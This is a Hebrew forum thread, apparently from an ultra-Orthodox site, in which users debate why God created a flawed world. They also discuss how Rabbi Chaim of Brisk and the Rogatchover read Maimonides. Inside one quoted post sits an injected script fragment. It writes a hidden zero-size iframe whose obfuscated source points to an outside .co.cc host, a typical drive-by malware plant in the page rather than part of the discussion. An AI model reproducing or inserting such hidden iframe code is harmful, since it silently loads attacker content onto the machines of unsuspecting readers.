בית פורומים עצור כאן חושבים

למה??? בשביל מה הא-ל היה צריך לברוא עולם

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-9/7/2014 12:52 לינק ישיר 

מם

לא מדובר על כמיהה אלא על המשך המסירה מרבותיהם על ידי תלמידיהם ,רב חיים היה שיעור של אטרקציה שהכניס איזשהו ניחוח יחודי על ידי חקירות ושני דינים לתלמידיו ,[לדעתי הוא לא היה מהפכן שעוד לא היה קיים]ומשם צמח רב ברוך בער בדרכו הוא ורב שמעון בדרכו הוא ומשם ההיסטוריה
רב שמעון שקופ הוא מהפכן בתורתו האנליטית והפילסופית ובלהיות אי של שפיות בתוך אי הבנה וסדר שלא היה לפניו וגם אין בימינו ,[רב יוסל שרייבר אולי?] ומי שכן הולך בדרכו יוצא חריג,
הרוגיצובר לא היה מגיד שיעור ומעמיד תלמידים,

דדווח על תוכן פוגעני

נשלח ב-9/7/2014 13:07 לינק ישיר 

ירוחם,
וכי טוב אתה מרש"ש? אותו מותר להשפיל ואותך לא? אני מכיר את הקדמתו, ולמיטב הבנתי כולה מתום ואין בה שום סתירה. זו עוד יצירת מופת מבית מדרשו. אשמח לעמוד לשירותך בנושא זה.
אגב, קרא היטב את הקדמתו ותראה כיצד יש להתייחס לסתירות בספרו (ראה גם בהקדמת מו"נ, ואכ"מ), ומה התנאי שהוא מציב למי שקורא את ספרו, ודפח"ח. דומני שאם היית קורא אותה היטב ומבין אותה לא היית אומר את מה שאמרת.
ובשולי דבריי, אני מתייחס לדברי האדם ולא לאומר (בפרט שהוא ניק). אשמח להיות ידידך, ואני חש כידידך. אני גם שמח על כל הסכמה בינינו. אבל על כל דבר שיש לי ביקורת אתה תמשיך לחטוף ממני (ולפום שבשתא חריפותא, תרתי משמע). בדיוק כפי שאני מצפה ממך ביחסך אליי. הסכמות ואי הסכמות באות בגלל התוכן ולא בגלל היחס האישי. כך זה אצלי ואני מצפה שכך גם יהיה אצלך. אין לי עניין בהקמת קואליציות יציבות. 

מ,
א. אתה דיברת על הגלות מול א"י. כעת אתה מעלה שאלה חדשה: למה דווקא ליטא. לא על כך דיברתי. להיפך, כתבתי שיש מקום לבקר אותם על צמידות למתודות מסויימות. אבל הקישור לא"י וגולה הוא בלתי רלוונטי. וחוצמזה, מי שמוצאת חן בעיניו תורת ליטא עוסק בה. מה רע בזה? כל אחד בוחר את בית המדרש ואת המתודות שמדברות אליו, ואדם לומד במקום שליבו חפץ.
ב. כנ"ל.
ג. אתה סותר את עצמך. הנה, אתה עצמך אומר שהם לא נצמדים לגר"ח כי היצמדותם אליו לא ממשיכה את דרכו (שלא נצמד לקודמיו, לשיטתך). אגב, לדעתי אתה טועה בזה. הגר"ח חשב שהוא ממשיך את קודמיו והתכוין לזה, והוא גם די צדק לדעתי. הוא רק הכניס את הדברים לדפוס וסוג ניתוח אחר. זאת בניגוד לדמגוגיות שמדברות על כך שאין קשר בין פירושו לבין כוונת הרמב"ם המקורית. זה פשוט לא נכון. ברור שיש לא מעט מקומות שאפשר להתווכח, אבל לדעתי זה לא מהותי לשיטתו.
בשולי דבריי אומר שיש שלושה סוגי חזונאישניקים: א. אלו שעושים את כל מה שכתוב בספרי חזו"א. ב. אלו שעושים את מה שהם עצמם חושבים, כמו שהחזו"א עשה את מה שהוא עצמו חושב. אבל יש גם סוג שלישי: ג. אלו שעושים את מה שהם עצמם חושבים לא בגלל שהחזו"א עשה את מה שהוא עצמו חושב אלא בגלל שהם בעלי מחשבה אוטונומית. השאלה האם הם ראויים לתואר חזונאישניקים? לדעתי כן. דווקא הם. ודוק היטב.

דדווח על תוכן פוגעני

נשלח ב-9/7/2014 14:24 לינק ישיר 

ר מיכי
סלקא דעתך כי הייתי כותב משהו על ספרו של מישהו מבלי לקרא-או ללמוד את הספר?
 אני יודע כי בנושא הזה דעותנו חלוקות, אתה איש הפילוסופיה- ואני רק בפשוטם של מקראות וסוגיות עוסק.

דדווח על תוכן פוגעני

נשלח ב-9/7/2014 14:42 לינק ישיר 

חסדא,

השאלה איננה על תלמידי רבי חיים מבריסק ותלמידי תלמידיו הממשיכים את תורתו, אלא לאן נעלמה התורה של גדולי תורה אחרים שהעמידו הרבה תלמידים, ומדוע הרבה בני ישיבות שנולדו בא"י ואבותיהם או אבות אבותיהן הגיעו מגלויות אחרות נמשכים כל כך לתורה של רבי חיים ותלמידיו?

דדווח על תוכן פוגעני

נשלח ב-9/7/2014 15:03 לינק ישיר 

לירובעל, לחזקואמץ,

א. התשובה 'ככה!' אינה תשובה פשטנית, ואינה באה מתוך זלזול. זו, בתמצית גמורה, תשובתו של אלהים לאיוב. איוב שואל את שאלותיו ביושר אינטלקטואלי חריף, ואינו מקבל אף תשובה לשאלותיו, רק אישור כי ביושר דיבר.
כמובן, הספר מביא לנו את דעתו של המחבר.

ב. מה שאנחנו יכולים להשיג על האל, טבעו וכוונותיו הוא מתוך התבוננות בעולם והבנתנו את העולם.
ההתבוננות והבנת אותה התבוננות אינן קופסה ריקה שהעולם מונח בתוכה ואנחנו מתבוננים בו כפי שהוא. זו קופסה עם מבנים וכלים משלה.

ג. השיחה שאנחנו משוחחים עם האל אינה נקיה מאינטרסים אנושיים, חלקם בעלי הצדקה, חלקם חסרים אותה.

השיחה כאן חסרה את ההתמודדות עם הספרות הרבה העוסקת בנושא הרחב הזה, לכן היא יכולה להיות רק הערה מאד כללית.
עודד

תוקן על ידי 932woland ב- 09/07/2014 15:03:28

תוקן על ידי 932woland ב- 09/07/2014 15:04:25

דדווח על תוכן פוגעני

נשלח ב-9/7/2014 15:09 לינק ישיר 

הרב מיכי,

האם רבי חיים מבריסק היה תלמידו-ממשיכו של הרמב"ם ושיטתו איננה אלא פרי תלמודו והבנתו את תורת הרמב"ם או שמא חריפותו דוגמא לדרכי לימוד חריפות שהיו מצויים באותה תקופה בליטא ואם-כן מה מקורן?

דדווח על תוכן פוגעני

נשלח ב-9/7/2014 16:48 לינק ישיר 

בר מינה מר' ירוחם דחביבה ליה א"י.
מדינת ישראל היא לא הטוב שבכל העולמות, אפילו הרבה מתחת לכך.
בתור מי שכן התגורר בחו"ל במשך זמן רב מחייו, התשובה היא בהחלט כן. הייתי חוזר כאן ועכשיו למקום מגורי הקודם בחו"ל, אם רק אשתי הייתה מסכימה לכך.
ארץ מוכת מלחמות ושנאה היא לא המקום הכי טוב בעולם. זה פשוט מגוחך אפילו לומר זאת. מעטים מאוד התחומים שבהם ישראל מצטיינת לטובה משאר מדינות העולם המפותחות. רק אציין את הבירוקרטיה, תחבורה ציבורית, כבישים, אלימות, מחירי הדירות, מחירי המזון. נראה לי שזו רשימה מספיקה.

ורק שלא תבין לא נכון, אני מאוד אוהב את מדינת ישראל. אני ציוני. אבל אני לא עוצם עיניים. יש הרבה מה לשפר פה. הפתרון הוא לא לעזוב, אלא להישאר ולתקן. אבל ודאי שהפתרון הוא לא להגיד מדינת ישראל הוא המקום הטוב בעולם. על זה נאמר פחח

דדווח על תוכן פוגעני

נשלח ב-9/7/2014 17:31 לינק ישיר 

932woland כתב:
לירובעל, לחזקואמץ,

א. התשובה 'ככה!' אינה תשובה פשטנית, ואינה באה מתוך זלזול. זו, בתמצית גמורה, תשובתו של אלהים לאיוב. איוב שואל את שאלותיו ביושר אינטלקטואלי חריף, ואינו מקבל אף תשובה לשאלותיו, רק אישור כי ביושר דיבר.
כמובן, הספר מביא לנו את דעתו של המחבר.

ב. מה שאנחנו יכולים להשיג על האל, טבעו וכוונותיו הוא מתוך התבוננות בעולם והבנתנו את העולם.
ההתבוננות והבנת אותה התבוננות אינן קופסה ריקה שהעולם מונח בתוכה ואנחנו מתבוננים בו כפי שהוא. זו קופסה עם מבנים וכלים משלה.

ג. השיחה שאנחנו משוחחים עם האל אינה נקיה מאינטרסים אנושיים, חלקם בעלי הצדקה, חלקם חסרים אותה.

השיחה כאן חסרה את ההתמודדות עם הספרות הרבה העוסקת בנושא הרחב הזה, לכן היא יכולה להיות רק הערה מאד כללית.
עודד

תוקן על ידי 932woland ב- 09/07/2014 15:03:28

תוקן על ידי 932woland ב- 09/07/2014 15:04:25

הדברים שאתה כותב על האל, האם זה מה שקראת עליו בספרים ושמעת מאחרים או שיש לך ידיעה על האל מכלי ראשון ?

דדווח על תוכן פוגעני

נשלח ב-9/7/2014 18:24 לינק ישיר 

מם 
כמדומני שעניתיך,בכל הישיבות הליטאיות המשיכו בדרך זו כפי שקיבלו מרבותיהם ,
לפני השואה היתה כאן ישיבת עץ חיים שבו לימד תלמידו של רב חיים רב איסר זלמן מלצר,
וכך בחברון ,
הספרדים המשיכו בדרכם ,יוצאי גליציה היוו את הישיבות החסידיות ויוצאי הונגריה תלמידי החתם סופר לדורותיהם המשיכו בדרכם ,

דדווח על תוכן פוגעני

נשלח ב-9/7/2014 18:43 לינק ישיר 

מ,
קשה לקרוא לר' חיים תלמידו של הרמב"ם, כי הוא לא לקח ממנו מתודות ודרכי חשיבה. אבל הוא עוסק בפירוש דבריו של הרמב"ם, ועושה זאת כמובן בכלים ובמושגים שלו (מה שכינית חריפות ליטאית).
אבל בה במידה הרמב"ם (כמו הרי"ף, והרשב"א והרמב"ן ושאר ראשונים) לא היה תלמידו של ר' אשי. הוא פירש אותו ופסק מתוך דבריו. וכך הוא היחס בין רעק"א לרמב"ם ולרשב"א ולקודמיו, ובין כל דור לקודמיו.
יתר על כן, ר' אשי עוד הותיר בידינו גם מתודה, כי ספרו (הגמרא) מלא במו"מ ולא רק בפסקים חתוכים ולכן אפשר בקלות יחסית ללמוד את דרכי חשיבתו. לעומת זאת, הרמב"ם השאיר לנו בעיקר פסקים חתוכים ופחות פירושים ודרכי פרשנות (למעט השו"ת, קצת פיהמ"ש וקצת פירושי הגמרא, כמו לר"ה). אז כיצד בכלל ניתן להיות תלמידי הרמב"ם במובן דומה לתלמידי ר' חיים למשל?

דדווח על תוכן פוגעני

נשלח ב-9/7/2014 19:54 לינק ישיר 

הרב מיכי,

רבי חיים מבריסק בחר ללמוד בעיון ולהגות במשנה תורה להרמב"ם ומהבחינה הזו הינו תלמידו. אולם כנראה אתה צודק שלא ניסה כרוגוצ'ובר להבין את דרך הפסיקה של הרמב"ם בעזרת מורה נבוכים. הרמב"ם בצעירותו הירבה להגות בתורתם של רב נסים גאון ורבי יצחק אבן גיאת, אח"כ הגה בתורתם של הגאונים, ובהמשך היה לתלמידם של חז"ל באופן מקיף, ועל-כן פסיקתו מבוססת על ספרא, ספרי, התוספתא, ושני התלמודים.

דדווח על תוכן פוגעני

נשלח ב-9/7/2014 23:57 לינק ישיר 

הרוגוצ'ובר ניסה להבין את דרך פסיקתו של הרמב"ם? הצחקת אותי. ר' חיים ניסה. הרוגצ'ובר אפילו לא ניסה. השימוש שלו במו"נ לא נוגע להסברים שמובאים שם אלא למושגים ולתפיסות המושגיות בלבד |(האם הזמן מורכב מחלקים או לא. האם הרכבה היא שכונית או מזגית). ובכלל, אלו מושגים אריסטוטליים. שום קשר לכוונת הרמב"ם עצמו.

דדווח על תוכן פוגעני

נשלח ב-10/7/2014 18:54 לינק ישיר 

כדאי למצוא הלכות שפסק הרמב"ם ופירשו רבי חיים מבריסק, הרוגוצ'ובר, ורבי שלמה פוליאצ'ק, ולהסביר מה נמצא בכלל פירושיהם, במה פירושיהם נבדלים זה מזה, והאם הצליחו לכוון לדעתו של הרמב"ם. אינני יודע אם לימוד שכזה יצליח בהכרח לברר את דעת הרמב"ם, אולם ככל הנראה יתן כלים להבנה מעמיקה דקה וכללית יותר של יסודות שיטות החילוקים הליטאיות.

דדווח על תוכן פוגעני

נשלח ב-10/7/2014 19:04 לינק ישיר 

חזקואמץ כתב:

לדוגמא, הנחת הנחה מאוד בעייתית, שהעולם במתכונתו הנוכחית הוא "שיא השלמות". הבעיה שבהנחה הזו היא שכל חמשת החושים שלנו מעידים שזה לא נכון. זו הנחה שמגיעה מטיעון פילוסופי כלשהו, שגם אם מבחינה פילוסופית נניח שהוא תקף, המציאות דוחה אותו בשתי ידיים.
העולם לא מושלם. נקודה. יש בו המון חסרונות והמון פגמים. יש גם הרבה רוע בעולם.
זו המציאות ומי שמתווכח איתה הוא מנותק מהמציאות.

זה בדיוק מה שהתכוונתי לומר, (אולי לא הסברתי את עצמי אולי לא הובנתי).

העולם רע ולא מושלם, עובדה יש את החמאס (בכל דור ודור) ויש שרוצחים בגלל ריב על חנייה. אבל אין ספק שאם הא-ל ברא את העולם במתכונתה הנוכחית. זה אומר שזה המתכון המדויק והכי מופתי ומושלם פילוסופית ושכלית לברוא עולם לבני אנוש.   אנשים חכמים עושים טעויות וכשלים, ולפעמים זה בגלל שהם לא מספיק חכמים (ולפעמים בגלל אגו), וכשמגיע אדם חכם יותר הוא מתקן ומשנה, ואז בא אדם עוד יותר חכם ומשנה שוב, אבל אצל הא-ל שחכמתו מושלמת (וגם יכולותיו) אין ספק שהוא הביא את הגרסה הכי הכי לעולם.

והעולם הזה, שאין ספק שהוא המודל הכי מוצלח עבור בני האדם, הוא עולם לא מושלם! עולם רע!  עד כדי כך ששה מיליון ועוד כמה מיליארדים שואלים למה??  ואגב, אדון ירוחםשמ יש לי בשבילך חדשות לא רק יוצאי מצרים שאלו למה, גם הרמח"ל העז לשאול למה? והיות ואני לא מרגישה שתשובתו מספקת אותי, אז גם אני שואלת למה? אני מאמינה שכשכאן בפורום שואלים למה לא שואלים את זה בטון של טומי לפיד אלא בטון של הרמח"ל, למה עולם של כאב, רשע, אסונות, וכו' זה עולם מושלם יצירת מופת של הא-ל. 

נ.ב. אני יכולה להבין שאנחנו לא נוכל להבין

דדווח על תוכן פוגעני

נשלח ב-10/7/2014 19:29 לינק ישיר 

מיימוני כתב:

יש שיצביעו על כך שהעיקר הוא העולם הבא. אז מה זה משנה, באמת, כמה זמן חיים כאן. הנקודה היא להספיק. לעשות את הראוי.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

אני עוברת אחד אחד על התגובות, (זה לוקח לי זמן, מה לעשות מחוץ לעבודה אני בדרך כלל קוראת רק ירחונים ואני לא רגילה לחומר מחשבתי) אז תגובתי לחזק ואמץ תהיה גם לדבריך, ואולי גם למגיבים הבאים אחריך.

אולי אתה צודק שהעיקר הוא העולם הבא, אבל לפי מה שלמדתי, רוב האנושות תלך לגהינום (אחרי שסבלו כאן 70-90 שנה), חלק נשמתם תכרת, חלק יתגלגלו כאן חזרה בתוך חתול או אבן או אולי כמו יהודי מנודה מפונוביז, והמעט שנשאר אחרי שיגמרו לזקק את עצמם ויעברו לגן עדן, יקנאו בצדיקים וירגישו זבל שלא אספו כאן יותר יהלומים בגנזי המלך, בקיצור רק החפץ חיים שבכל דור יזכה ליהנות ולהשלים את מסעו אל היעד הנכסף, וכל שאר המיליונים שנולדו בכל שנה ושנה ילכו לעזאזל.
אני מרגישה שחסר כאן משהו מאוד מהותי בהסבר זה, גם אם תאמר שכל האנושות תזדכך פעם אחר פעם אחר פעם עד להגיעם לשלמות הנכספת. 

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > למה??? בשביל מה הא-ל היה צריך לברוא עולם
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 3 4 5 6 7 לדף הבא סך הכל 7 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.